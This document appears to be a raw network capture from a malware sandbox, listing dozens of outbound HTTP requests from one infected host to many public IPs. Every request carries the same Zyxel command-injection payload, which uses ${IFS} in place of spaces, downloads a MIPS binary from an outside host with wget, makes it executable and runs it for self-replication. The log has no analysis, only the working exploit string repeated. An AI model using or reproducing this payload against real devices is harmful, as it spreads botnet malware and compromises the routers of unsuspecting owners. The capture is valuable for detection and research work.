                                          Jan 14, 2024 15:45:50.650063992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          53192.168.2.233662213.238.224.43443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.650091887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          54192.168.2.2350292107.211.98.50443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.650124073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          55192.168.2.2356432152.119.109.238443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.650166035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          56192.168.2.234593093.233.183.34443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.650193930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          57192.168.2.234101449.179.210.175443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.650203943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          58192.168.2.2357762197.226.215.212443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.650242090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          59192.168.2.234467680.122.221.220443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.650284052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          60192.168.2.2354934218.51.121.220443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.650293112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          61192.168.2.235680676.255.122.162443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.650358915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          62192.168.2.235123892.44.254.1443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.650393963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          63192.168.2.2355540193.89.213.208443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.650414944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          64192.168.2.2345996205.217.128.58443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.650449038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          65192.168.2.233807275.132.199.250443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.650500059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          66192.168.2.2347742124.150.225.109443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.650531054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          67192.168.2.2342754190.100.90.154443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.650557995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          68192.168.2.235327090.239.81.96443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.650607109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          69192.168.2.235303836.221.101.235443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.650640011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          70192.168.2.235430081.19.230.18443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.650696993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          71192.168.2.235818084.221.22.153443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.650702000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          72192.168.2.234234661.56.56.70443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.650734901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          73192.168.2.235041671.46.183.33443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.650763988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          74192.168.2.2334230144.5.39.36443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.650834084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          75192.168.2.2350406102.136.205.40443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.650861025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          76192.168.2.2346972143.84.190.208443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.650890112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          77192.168.2.234685065.177.16.79443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.650926113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          78192.168.2.2337660206.190.197.155443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.650958061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          79192.168.2.2359058219.243.27.104443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.650979996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          80192.168.2.234900850.129.159.78443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.651038885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          81192.168.2.234023214.166.169.217443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.651046038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          82192.168.2.2347298100.163.103.216443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.651051998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          83192.168.2.23492644.177.5.196443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.651078939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          84192.168.2.2341066189.167.23.225443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.651129007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          85192.168.2.233829865.182.50.38443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.651129961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          86192.168.2.2348042183.21.162.195443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.651191950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          87192.168.2.2353630107.228.145.100443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.651209116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          88192.168.2.2335774143.124.73.205443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.651241064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          89192.168.2.2348410118.97.249.82443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.651242971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          90192.168.2.235241265.76.60.67443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.651300907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          91192.168.2.235177825.107.163.172443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.651351929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          92192.168.2.2360744206.97.102.131443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.651379108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          93192.168.2.2346898178.79.138.155443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.651407003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          94192.168.2.234800834.14.93.53443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.651592016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          95192.168.2.233297073.157.204.117443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.651607037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          96192.168.2.2347244195.222.129.0443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.651637077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          97192.168.2.2352930176.5.3.211443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.652097940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          98192.168.2.235784899.187.122.126443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.652097940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          99192.168.2.2345002139.184.192.42443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.652142048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          100192.168.2.2344248216.92.112.55443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.652182102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          101192.168.2.2355800198.109.20.192443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.652201891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          102192.168.2.2344428162.34.42.114443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.652242899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          103192.168.2.2341622118.58.165.68443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.652254105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          104192.168.2.235802041.78.113.97443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.652293921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          105192.168.2.2356548109.229.138.204443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.652331114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          106192.168.2.2341924106.227.123.16443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.652384043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          107192.168.2.233370450.145.101.50443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.652399063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          108192.168.2.233441220.187.187.125443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.652420998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          109192.168.2.2347030149.109.149.129443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.652457952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          110192.168.2.2337194153.146.144.93443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.652477026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          111192.168.2.2357014148.44.175.60443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.652503014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          112192.168.2.2337642132.105.73.55443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.652559996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          113192.168.2.2336114129.72.2.24443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.652626038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          114192.168.2.2360196121.129.89.53443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.652671099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          115192.168.2.2334086113.139.18.195443
                                          TimestampBytes transferredDirectionData
